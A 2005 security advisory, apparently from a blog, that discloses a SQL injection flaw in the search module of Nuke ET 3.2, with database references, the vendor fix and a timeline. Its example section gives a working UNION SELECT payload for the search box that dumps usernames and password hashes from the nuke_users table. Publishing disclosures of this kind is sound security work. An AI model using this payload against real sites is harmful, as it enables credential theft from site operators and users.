###############################################
Nuke ET 'search' module 'query' variable SQL injection
Vendor url: www.truzone.org
exploit available:yes vendor notify:yes
advisore:http://lostmon.blogspot.com/2005/11/
nuke-et-search-module-query-variable.html
OSVDB ID:21002
Secunia:SA17638
BID:15519
################################################
Nuke ET have a flaw which can be exploited by malicious people to
conduct SQL injection attacks.
Input passed to the "query" parameter when performing a search isn't
properly sanitised before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting arbitrary SQL code.
#################
versions:
################
Nuke ET 3.2
posible prior versions are afected.
##################
solution:
###################
the vendor has release a fix
http://www.truzone.org/modules.php?name=
DescNuke&d_op=getit&lid=1557
aply the fix as fast posible
####################
Timeline
####################
discovered:21-11-2005
vendor notify:21-11-2005
vendor response:21-11-2005
vendor fix:21.11.2005
disclosure:21-11-2005
###################
example:
###################
go to
http://[Victim]/modules.php?name=Search
and write in the search box this proof
s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*
all users hashes are available to view..
#################### €nd ########################
Thnx to estrella to be my ligth
Thnx to Truzone
Thnx to RiXi
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)